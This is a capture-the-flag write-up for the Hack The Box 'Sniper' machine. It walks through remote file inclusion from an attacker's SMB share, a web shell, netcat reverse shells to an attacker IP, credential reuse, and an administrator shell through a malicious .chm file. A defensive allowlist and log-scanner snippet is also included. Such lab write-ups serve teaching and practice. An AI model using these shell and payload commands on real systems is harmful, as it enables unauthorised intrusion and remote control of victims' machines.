
Hack The Box - Sniper Writeup

Nmap

nmap -sC -sV -oA nmap -v 10.10.10.151

Output

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-20 04:49 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating Ping Scan at 04:49
Scanning 10.10.10.151 [2 ports]
Completed Ping Scan at 04:49, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:49
Completed Parallel DNS resolution of 1 host. at 04:49, 0.03s elapsed
Initiating Connect Scan at 04:49
Scanning 10.10.10.151 [1000 ports]
Discovered open port 445/tcp on 10.10.10.151
Discovered open port 135/tcp on 10.10.10.151
Discovered open port 80/tcp on 10.10.10.151
Discovered open port 139/tcp on 10.10.10.151
Completed Connect Scan at 04:49, 4.94s elapsed (1000 total ports)
Initiating Service scan at 04:49
Scanning 4 services on 10.10.10.151
Completed Service scan at 04:49, 7.20s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.10.151.
Initiating NSE at 04:49
Completed NSE at 04:49, 40.08s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.09s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Nmap scan report for 10.10.10.151
Host is up (0.021s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-03-20T15:49:20
|_  start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Initiating NSE at 04:49
Completed NSE at 04:49, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.88 seconds

From this scan we can see that the target is a Windows host running a web server, with SMB also exposed.

HTTP

Browsing through the pages on the web server we find a blog page with the ability to change the language. Upon changing the language we see that a GET parameter in the URL names a .php file to be included. This points to a Local File Inclusion vulnerability.

LFI/RFI Exploit

For this exploit we are going to host a web shell on an SMB server on our own machine and pass the UNC path of the share to the website, so that the include loads our web shell and gives us code execution.

Setting up an SMB Share

To set up our SMB share we first need to create a folder to host our files. I have used mkdir /mnt/smb_share for my configuration. We then need to edit our /etc/samba/smb.conf file to set up a public share.

Remove all of the contents of the file and replace them with the configuration below.

smb.conf

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[share]
path = /mnt/smb_share
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

Restart SMB Service

Restart the SMB service to load our new configuration file by running sudo service smbd restart.

We can quickly test that this works by running smbclient -L <IP Address> and pressing Enter at the password prompt. This should give the output below.

        Sharename       Type      Comment
        ---------       ----      -------
        share           Disk
        IPC$            IPC       IPC Service (Samba Server 4.11.5-Debian)
SMB1 disabled -- no workgroup available

Web Shell and Reverse Shell

Now that we have our Samba server set up we need to obtain our web shell and a netcat executable that can be uploaded without being detected by an antivirus program.

Download both of these files and place them in our Samba share folder.

With the files downloaded we can now load our web shell by navigating to http://10.10.10.151/blog/?lang=\\<ATTACK IP ADDRESS>\share\webshell.php, replacing <ATTACK IP ADDRESS> with your IP address.
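As an added example that is not part of the original writeup, here is the defensive counterpart to the ?lang= include used above: an allowlist resolver a language switcher could use instead of including whatever name the parameter carries, and a scanner that flags UNC paths, URL or stream-wrapper prefixes and traversal sequences in that parameter across IIS W3C log lines. The language files, IP addresses and log lines are constructed sample data, and the parser assumes the default IIS field order.

```python
import re
from urllib.parse import parse_qs, unquote

# Mitigation: map a language code to a fixed file instead of including
# whatever ?lang= names. Values outside the allowlist fall back to English.
ALLOWED_LANGS = {"en": "lang/en.php", "fr": "lang/fr.php", "de": "lang/de.php"}

def safe_lang_path(lang_value, default="en"):
    return ALLOWED_LANGS.get(lang_value, ALLOWED_LANGS[default])

# Detection: shapes of an include parameter value a defender should alert on.
UNC_RE = re.compile(r"^(\\\\|//)[^\\/]+[\\/]")        # \\host\share\file or //host/share/
URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)    # http://, ftp://, php:// wrappers
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")   # ../ or ..\ segments

def classify_lang(value):
    """Label a percent-decoded parameter value, or return None if it looks benign."""
    value = unquote(value)
    if UNC_RE.search(value):
        return "unc-include"
    if URL_RE.search(value):
        return "url-or-wrapper"
    if TRAVERSAL_RE.search(value):
        return "traversal"
    return None

def scan_iis_log(lines, param="lang"):
    """Walk IIS W3C log lines (default field order: date time s-ip cs-method
    cs-uri-stem cs-uri-query s-port cs-username c-ip ...) and return
    (client_ip, label, decoded_value) for every suspicious value of `param`."""
    hits = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 9 or fields[5] == "-":
            continue
        query, client_ip = fields[5], fields[8]
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            label = classify_lang(value)
            if label:
                hits.append((client_ip, label, unquote(value)))
    return hits

# Constructed sample log: a normal language switch, the UNC include from the
# writeup (raw and percent-encoded), and a traversal attempt. IPs are made up.
SAMPLE_LOG = r"""#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2020-03-20 15:49:20 10.10.10.151 GET /blog/ lang=en.php 80 - 10.10.14.2 Mozilla/5.0 200
2020-03-20 15:50:01 10.10.10.151 GET /blog/ lang=\\10.10.14.2\share\webshell.php 80 - 10.10.14.2 Mozilla/5.0 200
2020-03-20 15:50:30 10.10.10.151 GET /blog/ lang=%5C%5C10.10.14.2%5Cshare%5Cwebshell.php 80 - 10.10.14.2 Mozilla/5.0 200
2020-03-20 15:51:00 10.10.10.151 GET /blog/ lang=../../windows/win.ini 80 - 10.10.14.9 curl/7.68.0 200
""".splitlines()

if __name__ == "__main__":
    for ip, label, value in scan_iis_log(SAMPLE_LOG):
        print(f"{ip:<12} {label:<16} {value}")
```

Percent-encoded variants are decoded once by parse_qs and once more by classify_lang, so a single layer of double encoding does not hide the UNC prefix.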

Now that we have a web shell we can get our reverse shell by doing the following.

Create a working folder

  • Set CWD to C:\
  • Set Cmd to mkdir temp
  • Press Execute

Upload nc.exe

  • Set CWD to C:\temp
  • Press browse and select our nc.exe file

Executing reverse shell

  • Open a terminal session and run nc -nvlp 1234
  • Set CWD to C:\temp
  • Set Cmd to nc.exe <ATTACK IP ADDRESS> 1234 -e powershell.exe replacing <ATTACK IP ADDRESS> with your IP address.
  • Press Execute

Our terminal should now receive a PowerShell session as the user iusr.

Escalating to user

Browsing through the website files in the terminal we come across a db.php file which contains MySQL credentials. We find the password 36mEAhz/B8xQ~2VM.

Now that we have a password, we can see from the Users folder that there is a single user on this box. Sometimes administrators are lazy and reuse the same password, so let's try to switch to the user Chris.

Set PowerShell variables

  • $password = "36mEAhz/B8xQ~2VM" | ConvertTo-SecureString -AsPlainText -Force
  • $username = "nt authority\Chris"
  • $credential = New-Object System.Management.Automation.PsCredential($username,$password)

Download netcat as Chris

  • Open a new terminal session
  • cd to our smb mount folder
  • Start a Python web server with python -m SimpleHTTPServer
  • Download our nc.exe binary with Invoke-Command -ComputerName sniper -Credential $credential -Scriptblock { IWR -uri <ATTACK IP ADDRESS>:8000/nc.exe -outfile nc.exe }, replacing <ATTACK IP ADDRESS> with your IP address.

Execute reverse shell as Chris

  • Open a new terminal session
  • Start a netcat listener with nc -nvlp 4455
  • Launch nc.exe as Chris from our existing PowerShell session with Invoke-Command -ComputerName sniper -Credential $credential -Scriptblock { cmd /c nc.exe <ATTACK IP ADDRESS> 4455 -e powershell.exe }, replacing <ATTACK IP ADDRESS> with your IP address.

This should pop a reverse PowerShell session as the user Chris, and we can find the user.txt file in the user's Desktop folder.

Escalating to root

Now that we have user we can begin to find our path to root.

In the Downloads folder we can see there is an instructions.chm file, which looks like documentation for an app the user is supposed to be writing.

In the C:\Docs folder there is a note.txt file.

note.txt

Hi Chris,
        Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.

Regards,
Sniper CEO.

From this note we can see that the CEO of the company is looking for an application documentation file and will look for it in this folder. This is a hint that our exploit is via the .chm file.

chm exploit

Now that we know our attack we can create our file with a payload. There are a few steps required to set up the creation of our exploit.

This exploit must be created from a Windows OS!!!

Download these applications

Install Microsoft HTML Help Workshop

  • Launch the executable and follow the steps

Nishang setup

  • Disable all antivirus software
  • Extract the folder to the C drive in a folder named nishang
  • Launch a PowerShell session as Administrator
  • Allow script execution with Set-ExecutionPolicy Unrestricted
  • Prevent Windows Defender from stopping file execution with Get-ChildItem -Path 'C:\nishang\' | Unblock-File
  • cd into the nishang folder
  • Import the PowerShell modules with Import-Module .\nishang.psm1

We should now have nishang installed. We can check this by running Get-Command -Module nishang. Running this should show various modules included with nishang. Ensure that you see a line stating Function Out-CHM 0.0 nishang as this is the module we will be using for this exploit.

Creating a doc.chm with payload

Since we already have netcat on the box we can create a simple payload to execute nc.exe as Administrator.

Out-CHM -Payload "C:\temp\nc.exe <ATTACK IP ADDRESS> 4466 -e powershell.exe" -HHCPath 'C:\Program Files (x86)\HTML Help Workshop'


Replace <ATTACK IP ADDRESS> with your IP address.

This command will create our doc.chm file.

Copy this file back over to our attacking machine and place it in the folder we used for our SMB share and Python web server. If you have stopped your Python web server, start it again with python -m SimpleHTTPServer.

Copy doc.chm to the box

With our Python web server running, go back to our PowerShell session as the user Chris, set the working directory to C:\Docs and run IWR -uri <ATTACK IP ADDRESS>:8000/doc.chm -outfile doc.chm, replacing <ATTACK IP ADDRESS> with your IP address, to download the doc.chm file to the box.

Administrator Shell

Now that we have the doc.chm file in the folder we can open another terminal session and start another netcat listener with nc -nvlp 4466 and wait for the Administrator to open the file and trigger our exploit.

After a few seconds the exploit will be triggered and we now have a reverse PowerShell session with Administrator privileges. The root.txt file can be found in the Administrator's Desktop folder.

If you found this writeup useful I would appreciate it if you could respect me on HackTheBox.eu. My profile can be found here!

This post is licensed under CC BY 4.0 by the author.